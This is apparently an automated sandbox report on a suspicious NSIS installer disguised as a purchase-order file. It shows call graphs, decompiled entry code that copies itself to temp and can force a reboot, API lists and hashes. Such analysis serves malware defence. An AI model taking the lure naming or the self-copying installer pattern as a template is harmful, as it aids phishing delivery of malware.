4276->4293 4277->4276 4283 403fb7 19 API calls 4278->4283 4279 404cea SendMessageA 4279->4274 4285 404cff SendMessageA 4279->4285 4286 404f30 4280->4286 4281 404c83 SendMessageA 4281->4287 4297 404a94 4283->4297 4284 404ee4 4284->4274 4294 404ef6 ShowWindow GetDlgItem ShowWindow 4284->4294 4291 404d12 4285->4291 4287->4273 4287->4274 4287->4279 4288->4289 4292 404d77 GlobalFree 4289->4292 4289->4293 4290 404b68 GetWindowLongA SetWindowLongA 4295 404b81 4290->4295 4302 404d23 SendMessageA 4291->4302 4292->4293 4293->4284 4301 40140b 2 API calls 4293->4301 4310 404db0 4293->4310 4294->4274 4298 404b87 ShowWindow 4295->4298 4299 404b9f 4295->4299 4296->4281 4296->4287 4297->4290 4300 404ae3 SendMessageA 4297->4300 4303 404b62 4297->4303 4306 404b30 SendMessageA 4297->4306 4307 404b1f SendMessageA 4297->4307 4315 403fec SendMessageA 4298->4315 4316 403fec SendMessageA 4299->4316 4300->4297 4301->4310 4302->4273 4303->4290 4303->4295 4306->4297 4307->4297 4308 404eba InvalidateRect 4308->4284 4309 404ed0 4308->4309 4313 404871 21 API calls 4309->4313 4311 404dde SendMessageA 4310->4311 4312 404df4 4310->4312 4311->4312 4312->4308 4314 404e68 SendMessageA SendMessageA 4312->4314 4313->4284 4314->4312 4315->4274 4316->4268 4318 404915 SendMessageA 4317->4318 4319 4048d9 GetMessagePos ScreenToClient SendMessageA 4317->4319 4321 40490d 4318->4321 4320 404912 4319->4320 4319->4321 4320->4318 4321->4296 4322 402036 4323 402a0c 18 API calls 4322->4323 4324 40203d 4323->4324 4325 402a0c 18 API calls 4324->4325 4326 402047 4325->4326 4327 402a0c 18 API calls 4326->4327 4328 402050 4327->4328 4329 402a0c 18 API calls 4328->4329 4330 40205a 4329->4330 4331 402a0c 18 API calls 4330->4331 4332 402064 4331->4332 4333 402078 CoCreateInstance 4332->4333 4334 402a0c 18 API calls 4332->4334 4335 40214d 4333->4335 4336 402097 4333->4336 4334->4333 4337 401423 25 API calls 4335->4337 4338 40217f 4335->4338 4336->4335 4339 40212c MultiByteToWideChar 4336->4339 4337->4338 4339->4335 4340 404f37 4341 404f45 4340->4341 4342 404f5c 4340->4342 4343 404f4b 4341->4343 4358 404fc5 4341->4358 4344 404f6a IsWindowVisible 4342->4344 4350 404f81 4342->4350 4345 404003 SendMessageA 4343->4345 4347 404f77 4344->4347 4344->4358 4348 404f55 4345->4348 4346 404fcb CallWindowProcA 4346->4348 4349 4048b6 5 API calls 4347->4349 4349->4350 4350->4346 4359 405cfb lstrcpynA 4350->4359 4352 404fb0 4360 405c59 wsprintfA 4352->4360 4354 404fb7 4355 40140b 2 API calls 4354->4355 4356 404fbe 4355->4356 4361 405cfb lstrcpynA 4356->4361 4358->4346 4359->4352 4360->4354 4361->4358 4362 4014b7 4363 4014bd 4362->4363 4364 401389 2 API calls 4363->4364 4365 4014c5 4364->4365 4366 402239 4367 402241 4366->4367 4368 402247 4366->4368 4369 402a0c 18 API calls 4367->4369 4370 402a0c 18 API calls 4368->4370 4372 402257 4368->4372 4369->4368 4370->4372 4371 402265 4374 402a0c 18 API calls 4371->4374 4372->4371 4373 402a0c 18 API calls 4372->4373 4373->4371 4375 40226e WritePrivateProfileStringA 4374->4375 4383 40243d 4384 402b16 19 API calls 4383->4384 4385 402447 4384->4385 4386 4029ef 18 API calls 4385->4386 4387 402450 4386->4387 4388 402473 RegEnumValueA 4387->4388 4389 402467 RegEnumKeyA 4387->4389 4391 402672 4387->4391 4390 40248c RegCloseKey 4388->4390 4388->4391 4389->4390 4390->4391 4393 4022bd 4394 4022c2 4393->4394 4395 4022ed 4393->4395 4396 402b16 19 API calls 4394->4396 4397 402a0c 18 API calls 4395->4397 4398 4022c9 4396->4398 4399 4022f4 4397->4399 4400 402a0c 18 API calls 4398->4400 4403 40230a 4398->4403 4404 402a4c RegOpenKeyExA 4399->4404 4401 4022da RegDeleteValueA RegCloseKey 4400->4401 4401->4403 4405 402a77 4404->4405 4411 402ac3 4404->4411 4406 402a9d RegEnumKeyA 4405->4406 4407 402aaf RegCloseKey 4405->4407 4409 402ad4 RegCloseKey 4405->4409 4412 402a4c 5 API calls 4405->4412 4406->4405 4406->4407 4408 406087 5 API calls 4407->4408 4410 402abf 4408->4410 4409->4411 4410->4411 4413 402aef RegDeleteKeyA 4410->4413 4411->4403 4412->4405 4413->4411

                                                                                                                          Executed Functions

                                                                                                                          Function 0040324F Relevance: 84.3, APIs: 26, Strings: 22, Instructions: 313stringfilecomCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 40324f-403283 SetErrorMode GetVersion 1 403285-40328d call 406087 0->1 2 403296-403326 call 40601d * 3 call 406087 * 2 #17 OleInitialize SHGetFileInfoA call 405cfb GetCommandLineA call 405cfb GetModuleHandleA 0->2 1->2 8 40328f 1->8 20 403332-403347 call 405819 CharNextA 2->20 21 403328-40332d 2->21 8->2 24 4033ac-4033b0 20->24 21->20 25 4033b2 24->25 26 403349-40334c 24->26 29 4033c5-4033dd GetTempPathA call 40321e 25->29 27 403354-40335c 26->27 28 40334e-403352 26->28 30 403364-403367 27->30 31 40335e-40335f 27->31 28->27 28->28 38 4033ff-403416 DeleteFileA call 402c88 29->38 39 4033df-4033fd GetWindowsDirectoryA lstrcatA call 40321e 29->39 33 403369-40336d 30->33 34 40339c-4033a9 call 405819 30->34 31->30 36 40337d-403383 33->36 37 40336f-403378 33->37 34->24 51 4033ab 34->51 43 403393-40339a 36->43 44 403385-40338e 36->44 37->36 41 40337a 37->41 53 40347d-40348c ExitProcess OleUninitialize 38->53 54 403418-40341e 38->54 39->38 39->53 41->36 43->34 49 4033b4-4033c0 call 405cfb 43->49 44->43 48 403390 44->48 48->43 49->29 51->24 55 4035a1-4035a7 53->55 56 403492-4034a2 call 4055bc ExitProcess 53->56 57 403420-403429 call 405819 54->57 58 40346d-403474 call 40374e 54->58 60 403644-40364c 55->60 61 4035ad-4035ca call 406087 * 3 55->61 70 403434-403436 57->70 69 403479 58->69 64 403652-403656 ExitProcess 60->64 65 40364e 60->65 88 403614-403622 call 406087 61->88 89 4035cc-4035ce 61->89 65->64 69->53 72 403438-403442 70->72 73 40342b-403431 70->73 76 403444-403451 call 4058cf 72->76 77 4034a8-4034bc call 405543 lstrcatA 72->77 73->72 75 403433 73->75 75->70 76->53 87 403453-403469 call 405cfb * 2 76->87 85 4034c9-4034e3 lstrcatA lstrcmpiA 77->85 86 4034be-4034c4 lstrcatA 77->86 85->53 91 4034e5-4034e8 85->91 86->85 87->58 99 403630-40363b ExitWindowsEx 88->99 100 403624-40362e 88->100 89->88 93 4035d0-4035d2 89->93 95 4034f1 call 405526 91->95 96 4034ea-4034ef call 4054a9 91->96 93->88 98 4035d4-4035e6 GetCurrentProcess 93->98 108 4034f6-403503 SetCurrentDirectoryA 95->108 96->108 98->88 111 4035e8-40360a 98->111 99->60 107 40363d-40363f call 40140b 99->107 100->99 100->107 107->60 109 403510-40352a call 405cfb 108->109 110 403505-40350b call 405cfb 108->110 118 40352f-40354b call 405d1d DeleteFileA 109->118 110->109 111->88 121 40358c-403593 118->121 122 40354d-40355d CopyFileA 118->122 121->118 123 403595-40359c call 405a49 121->123 122->121 124 40355f-40357f call 405a49 call 405d1d call 40555b 122->124 123->53 124->121 133 403581-403588 CloseHandle 124->133 133->121
                                                                                                                          C-Code - Quality: 77%
                                                                                                                          			_entry_() {
				intOrPtr _t40;
				CHAR* _t44;
				char* _t47;
				signed int _t49;
				void* _t53;
				intOrPtr _t55;
				int _t56;
				signed int _t59;
				signed int _t60;
				int _t61;
				signed int _t63;
				signed int _t66;
				int _t83;
				void* _t87;
				void* _t99;
				intOrPtr* _t100;
				void* _t103;
				CHAR* _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				void* _t113;
				signed int _t115;
				char* _t117;
				signed int _t118;
				void* _t120;
				void* _t121;
				char _t138;

				 *(_t121 + 0x1c) = 0;
				 *((intOrPtr*)(_t121 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
				_t110 = 0;
				 *(_t121 + 0x18) = 0x20;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t100 = E00406087(0);
					if(_t100 != 0) {
						 *_t100(0xc00);
					}
				}
				E0040601D("UXTHEME"); // executed
				E0040601D("USERENV"); // executed
				E0040601D("SETUPAPI"); // executed
				E00406087(0xd);
				_t40 = E00406087(0xb);
				 *0x423f84 = _t40;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x424038 = _t40;
				SHGetFileInfoA(0x41f538, 0, _t121 + 0x34, 0x160, 0); // executed
				E00405CFB(0x423780, "NSIS Error");
				_t44 = GetCommandLineA();
				_t117 = "\"C:\\Users\\alfons\\Desktop\\New PO-RJ-IN-003 - Knauf Queimados.exe\"";
				E00405CFB(_t117, _t44);
				 *0x423f80 = GetModuleHandleA(0);
				_t47 = _t117;
				if("\"C:\\Users\\alfons\\Desktop\\New PO-RJ-IN-003 - Knauf Queimados.exe\"" == 0x22) {
					 *((char*)(_t121 + 0x14)) = 0x22;
					_t47 =  &M0042A001;
				}
				_t49 = CharNextA(E00405819(_t47,  *((intOrPtr*)(_t121 + 0x14))));
				 *(_t121 + 0x1c) = _t49;
				while(1) {
					_t103 =  *_t49;
					_t125 = _t103;
					if(_t103 == 0) {
						break;
					}
					__eflags = _t103 - 0x20;
					if(_t103 != 0x20) {
						L8:
						__eflags =  *_t49 - 0x22;
						 *((char*)(_t121 + 0x14)) = 0x20;
						if( *_t49 == 0x22) {
							_t49 = _t49 + 1;
							__eflags = _t49;
							 *((char*)(_t121 + 0x14)) = 0x22;
						}
						__eflags =  *_t49 - 0x2f;
						if( *_t49 != 0x2f) {
							L18:
							_t49 = E00405819(_t49,  *((intOrPtr*)(_t121 + 0x14)));
							__eflags =  *_t49 - 0x22;
							if(__eflags == 0) {
								_t49 = _t49 + 1;
								__eflags = _t49;
							}
							continue;
						} else {
							_t49 = _t49 + 1;
							__eflags =  *_t49 - 0x53;
							if( *_t49 == 0x53) {
								__eflags = ( *(_t49 + 1) | 0x00000020) - 0x20;
								if(( *(_t49 + 1) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000002;
									__eflags = _t110;
								}
							}
							__eflags =  *_t49 - 0x4352434e;
							if( *_t49 == 0x4352434e) {
								__eflags = ( *(_t49 + 4) | 0x00000020) - 0x20;
								if(( *(_t49 + 4) | 0x00000020) == 0x20) {
									_t110 = _t110 | 0x00000004;
									__eflags = _t110;
								}
							}
							__eflags =  *((intOrPtr*)(_t49 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t49 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t49 - 2)) = 0;
								__eflags = _t49 + 2;
								E00405CFB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t49 + 2);
								L23:
								_t108 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t108);
								_t53 = E0040321E(_t125);
								_t126 = _t53;
								if(_t53 != 0) {
									L25:
									DeleteFileA("1033"); // executed
									_t55 = E00402C88(_t127, _t110); // executed
									 *((intOrPtr*)(_t121 + 0x10)) = _t55;
									if(_t55 != 0) {
										L35:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										_t134 =  *((intOrPtr*)(_t121 + 0x10));
										if( *((intOrPtr*)(_t121 + 0x10)) == 0) {
											__eflags =  *0x424014;
											if( *0x424014 == 0) {
												L62:
												_t56 =  *0x42402c;
												__eflags = _t56 - 0xffffffff;
												if(_t56 != 0xffffffff) {
													 *(_t121 + 0x18) = _t56;
												}
												ExitProcess( *(_t121 + 0x18));
											}
											_t118 = E00406087(5);
											_t111 = E00406087(6);
											_t59 = E00406087(7);
											__eflags = _t118;
											_t109 = _t59;
											if(_t118 != 0) {
												__eflags = _t111;
												if(_t111 != 0) {
													__eflags = _t109;
													if(_t109 != 0) {
														_t66 =  *_t118(GetCurrentProcess(), 0x28, _t121 + 0x1c);
														__eflags = _t66;
														if(_t66 != 0) {
															 *_t111(0, "SeShutdownPrivilege", _t121 + 0x24);
															 *(_t121 + 0x38) = 1;
															 *(_t121 + 0x44) = 2;
															 *_t109( *((intOrPtr*)(_t121 + 0x30)), 0, _t121 + 0x28, 0, 0, 0);
														}
													}
												}
											}
											_t60 = E00406087(8);
											__eflags = _t60;
											if(_t60 == 0) {
												L60:
												_t61 = ExitWindowsEx(2, 0x80040002);
												__eflags = _t61;
												if(_t61 != 0) {
													goto L62;
												}
												goto L61;
											} else {
												_t63 =  *_t60(0, 0, 0, 0x25, 0x80040002);
												__eflags = _t63;
												if(_t63 == 0) {
													L61:
													E0040140B(9);
													goto L62;
												}
												goto L60;
											}
										}
										E004055BC( *((intOrPtr*)(_t121 + 0x14)), 0x200010);
										ExitProcess(2);
									}
									if( *0x423f9c == 0) {
										L34:
										 *0x42402c =  *0x42402c | 0xffffffff;
										 *(_t121 + 0x18) = E0040374E( *0x42402c);
										goto L35;
									}
									_t115 = E00405819(_t117, 0);
									while(_t115 >= _t117) {
										__eflags =  *_t115 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t115 = _t115 - 1;
										__eflags = _t115;
									}
									_t131 = _t115 - _t117;
									 *((intOrPtr*)(_t121 + 0x10)) = "Error launching installer";
									if(_t115 < _t117) {
										_t113 = E00405543(_t134);
										lstrcatA(_t108, "~nsu");
										if(_t113 != 0) {
											lstrcatA(_t108, "A");
										}
										lstrcatA(_t108, ".tmp");
										_t119 = "C:\\Users\\alfons\\Desktop";
										if(lstrcmpiA(_t108, "C:\\Users\\alfons\\Desktop") != 0) {
											_push(_t108);
											if(_t113 == 0) {
												E00405526();
											} else {
												E004054A9();
											}
											SetCurrentDirectoryA(_t108);
											_t138 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
											if(_t138 == 0) {
												E00405CFB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t119);
											}
											E00405CFB(0x425000,  *(_t121 + 0x1c));
											 *0x425400 = 0x41;
											_t120 = 0x1a;
											do {
												E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x120)));
												DeleteFileA(0x41f138);
												if( *((intOrPtr*)(_t121 + 0x10)) != 0) {
													_t83 = CopyFileA("C:\\Users\\alfons\\Desktop\\New PO-RJ-IN-003 - Knauf Queimados.exe", 0x41f138, 1);
													_t140 = _t83;
													if(_t83 != 0) {
														_push(0);
														_push(0x41f138);
														E00405A49(_t140);
														E00405D1D(0, _t108, 0x41f138, 0x41f138,  *((intOrPtr*)( *0x423f90 + 0x124)));
														_t87 = E0040555B(0x41f138);
														if(_t87 != 0) {
															CloseHandle(_t87);
															 *((intOrPtr*)(_t121 + 0x10)) = 0;
														}
													}
												}
												 *0x425400 =  *0x425400 + 1;
												_t120 = _t120 - 1;
												_t142 = _t120;
											} while (_t120 != 0);
											_push(0);
											_push(_t108);
											E00405A49(_t142);
										}
										goto L35;
									}
									 *_t115 = 0;
									_t116 = _t115 + 4;
									if(E004058CF(_t131, _t115 + 4) == 0) {
										goto L35;
									}
									E00405CFB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t116);
									E00405CFB("C:\\Users\\alfons\\AppData\\Local\\Temp", _t116);
									 *((intOrPtr*)(_t121 + 0x10)) = 0;
									goto L34;
								}
								GetWindowsDirectoryA(_t108, 0x3fb);
								lstrcatA(_t108, "\\Temp");
								_t99 = E0040321E(_t126);
								_t127 = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								goto L25;
							} else {
								goto L18;
							}
						}
					} else {
						goto L7;
					}
					do {
						L7:
						_t49 = _t49 + 1;
						__eflags =  *_t49 - 0x20;
					} while ( *_t49 == 0x20);
					goto L8;
				}
				goto L23;
			}































                                                                                                                          0x00403260
                                                                                                                          0x00403264
                                                                                                                          0x0040326c
                                                                                                                          0x0040326e
                                                                                                                          0x00403273
                                                                                                                          0x00403283
                                                                                                                          0x00403286
                                                                                                                          0x0040328d
                                                                                                                          0x00403294
                                                                                                                          0x00403294
                                                                                                                          0x0040328d
                                                                                                                          0x0040329b
                                                                                                                          0x004032a5
                                                                                                                          0x004032af
                                                                                                                          0x004032b6
                                                                                                                          0x004032bd
                                                                                                                          0x004032c2
                                                                                                                          0x004032c7
                                                                                                                          0x004032ce
                                                                                                                          0x004032d4
                                                                                                                          0x004032ea
                                                                                                                          0x004032fa
                                                                                                                          0x004032ff
                                                                                                                          0x00403305
                                                                                                                          0x0040330c
                                                                                                                          0x0040331f
                                                                                                                          0x00403324
                                                                                                                          0x00403326
                                                                                                                          0x00403328
                                                                                                                          0x0040332d
                                                                                                                          0x0040332d
                                                                                                                          0x0040333d
                                                                                                                          0x00403343
                                                                                                                          0x004033ac
                                                                                                                          0x004033ac
                                                                                                                          0x004033ae
                                                                                                                          0x004033b0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403349
                                                                                                                          0x0040334c
                                                                                                                          0x00403354
                                                                                                                          0x00403354
                                                                                                                          0x00403357
                                                                                                                          0x0040335c
                                                                                                                          0x0040335e
                                                                                                                          0x0040335e
                                                                                                                          0x0040335f
                                                                                                                          0x0040335f
                                                                                                                          0x00403364
                                                                                                                          0x00403367
                                                                                                                          0x0040339c
                                                                                                                          0x004033a1
                                                                                                                          0x004033a6
                                                                                                                          0x004033a9
                                                                                                                          0x004033ab
                                                                                                                          0x004033ab
                                                                                                                          0x004033ab
                                                                                                                          0x00000000
                                                                                                                          0x00403369
                                                                                                                          0x00403369
                                                                                                                          0x0040336a
                                                                                                                          0x0040336d
                                                                                                                          0x00403375
                                                                                                                          0x00403378
                                                                                                                          0x0040337a
                                                                                                                          0x0040337a
                                                                                                                          0x0040337a
                                                                                                                          0x00403378
                                                                                                                          0x0040337d
                                                                                                                          0x00403383
                                                                                                                          0x0040338b
                                                                                                                          0x0040338e
                                                                                                                          0x00403390
                                                                                                                          0x00403390
                                                                                                                          0x00403390
                                                                                                                          0x0040338e
                                                                                                                          0x00403393
                                                                                                                          0x0040339a
                                                                                                                          0x004033b4
                                                                                                                          0x004033b7
                                                                                                                          0x004033c0
                                                                                                                          0x004033c5
                                                                                                                          0x004033c5
                                                                                                                          0x004033d0
                                                                                                                          0x004033d6
                                                                                                                          0x004033db
                                                                                                                          0x004033dd
                                                                                                                          0x004033ff
                                                                                                                          0x00403404
                                                                                                                          0x0040340b
                                                                                                                          0x00403412
                                                                                                                          0x00403416
                                                                                                                          0x0040347d
                                                                                                                          0x0040347d
                                                                                                                          0x00403482
                                                                                                                          0x00403488
                                                                                                                          0x0040348c
                                                                                                                          0x004035a1
                                                                                                                          0x004035a7
                                                                                                                          0x00403644
                                                                                                                          0x00403644
                                                                                                                          0x00403649
                                                                                                                          0x0040364c
                                                                                                                          0x0040364e
                                                                                                                          0x0040364e
                                                                                                                          0x00403656
                                                                                                                          0x00403656
                                                                                                                          0x004035b6
                                                                                                                          0x004035bf
                                                                                                                          0x004035c1
                                                                                                                          0x004035c6
                                                                                                                          0x004035c8
                                                                                                                          0x004035ca
                                                                                                                          0x004035cc
                                                                                                                          0x004035ce
                                                                                                                          0x004035d0
                                                                                                                          0x004035d2
                                                                                                                          0x004035e2
                                                                                                                          0x004035e4
                                                                                                                          0x004035e6
                                                                                                                          0x004035f3
                                                                                                                          0x00403602
                                                                                                                          0x0040360a
                                                                                                                          0x00403612
                                                                                                                          0x00403612
                                                                                                                          0x004035e6
                                                                                                                          0x004035d2
                                                                                                                          0x004035ce
                                                                                                                          0x00403616
                                                                                                                          0x0040361b
                                                                                                                          0x00403622
                                                                                                                          0x00403630
                                                                                                                          0x00403633
                                                                                                                          0x00403639
                                                                                                                          0x0040363b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403624
                                                                                                                          0x0040362a
                                                                                                                          0x0040362c
                                                                                                                          0x0040362e
                                                                                                                          0x0040363d
                                                                                                                          0x0040363f
                                                                                                                          0x00000000
                                                                                                                          0x0040363f
                                                                                                                          0x00000000
                                                                                                                          0x0040362e
                                                                                                                          0x00403622
                                                                                                                          0x0040349b
                                                                                                                          0x004034a2
                                                                                                                          0x004034a2
                                                                                                                          0x0040341e
                                                                                                                          0x0040346d
                                                                                                                          0x0040346d
                                                                                                                          0x00403479
                                                                                                                          0x00000000
                                                                                                                          0x00403479
                                                                                                                          0x00403427
                                                                                                                          0x00403434
                                                                                                                          0x0040342b
                                                                                                                          0x00403431
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403433
                                                                                                                          0x00403433
                                                                                                                          0x00403433
                                                                                                                          0x00403438
                                                                                                                          0x0040343a
                                                                                                                          0x00403442
                                                                                                                          0x004034b3
                                                                                                                          0x004034b5
                                                                                                                          0x004034bc
                                                                                                                          0x004034c4
                                                                                                                          0x004034c4
                                                                                                                          0x004034cf
                                                                                                                          0x004034d4
                                                                                                                          0x004034e3
                                                                                                                          0x004034e7
                                                                                                                          0x004034e8
                                                                                                                          0x004034f1
                                                                                                                          0x004034ea
                                                                                                                          0x004034ea
                                                                                                                          0x004034ea
                                                                                                                          0x004034f7
                                                                                                                          0x004034fd
                                                                                                                          0x00403503
                                                                                                                          0x0040350b
                                                                                                                          0x0040350b
                                                                                                                          0x00403519
                                                                                                                          0x00403520
                                                                                                                          0x00403529
                                                                                                                          0x0040352f
                                                                                                                          0x0040353b
                                                                                                                          0x00403541
                                                                                                                          0x0040354b
                                                                                                                          0x00403555
                                                                                                                          0x0040355b
                                                                                                                          0x0040355d
                                                                                                                          0x0040355f
                                                                                                                          0x00403560
                                                                                                                          0x00403561
                                                                                                                          0x00403572
                                                                                                                          0x00403578
                                                                                                                          0x0040357f
                                                                                                                          0x00403582
                                                                                                                          0x00403588
                                                                                                                          0x00403588
                                                                                                                          0x0040357f
                                                                                                                          0x0040355d
                                                                                                                          0x0040358c
                                                                                                                          0x00403592
                                                                                                                          0x00403592
                                                                                                                          0x00403592
                                                                                                                          0x00403595
                                                                                                                          0x00403596
                                                                                                                          0x00403597
                                                                                                                          0x00403597
                                                                                                                          0x00000000
                                                                                                                          0x004034e3
                                                                                                                          0x00403444
                                                                                                                          0x00403446
                                                                                                                          0x00403451
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403459
                                                                                                                          0x00403464
                                                                                                                          0x00403469
                                                                                                                          0x00000000
                                                                                                                          0x00403469
                                                                                                                          0x004033e5
                                                                                                                          0x004033f1
                                                                                                                          0x004033f6
                                                                                                                          0x004033fb
                                                                                                                          0x004033fd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040339a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040334e
                                                                                                                          0x0040334e
                                                                                                                          0x0040334e
                                                                                                                          0x0040334f
                                                                                                                          0x0040334f
                                                                                                                          0x00000000
                                                                                                                          0x0040334e
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • SetErrorMode.KERNELBASE ref: 00403273
                                                                                                                          • GetVersion.KERNEL32 ref: 00403279
                                                                                                                          • #17.COMCTL32(0000000B,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 004032C7
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004032CE
                                                                                                                          • SHGetFileInfoA.SHELL32(0041F538,00000000,?,00000160,00000000), ref: 004032EA
                                                                                                                          • GetCommandLineA.KERNEL32(00423780,NSIS Error), ref: 004032FF
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe",00000000), ref: 00403312
                                                                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe",00409130), ref: 0040333D
                                                                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033D0
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033E5
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F1
                                                                                                                          • DeleteFileA.KERNELBASE(1033), ref: 00403404
                                                                                                                            • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                                                                                            • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0040347D
                                                                                                                          • OleUninitialize.OLE32(00000000), ref: 00403482
                                                                                                                          • ExitProcess.KERNEL32 ref: 004034A2
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe",00000000,00000000), ref: 004034B5
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,004091AC,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe",00000000,00000000), ref: 004034C4
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe",00000000,00000000), ref: 004034CF
                                                                                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe",00000000,00000000), ref: 004034DB
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004034F7
                                                                                                                          • DeleteFileA.KERNEL32(0041F138,0041F138,?,00425000,?), ref: 00403541
                                                                                                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe,0041F138,00000001), ref: 00403555
                                                                                                                          • CloseHandle.KERNEL32(00000000,0041F138,0041F138,?,0041F138,00000000), ref: 00403582
                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004035DB
                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403633
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403656
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpi
                                                                                                                          • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SETUPAPI$SeShutdownPrivilege$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                          • API String ID: 2193684524-2806006107
                                                                                                                          • Opcode ID: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                                                                                                                          • Instruction ID: fae095d870e6aa7b2133663338cad99947a58f50826f320776521e81424d7011
                                                                                                                          • Opcode Fuzzy Hash: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                                                                                                                          • Instruction Fuzzy Hash: 19A1D370A083417AE7217F619C4AB2B7EAC9B4170AF54053FF881761D2CB7C9E058A6F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405620 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156filestringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
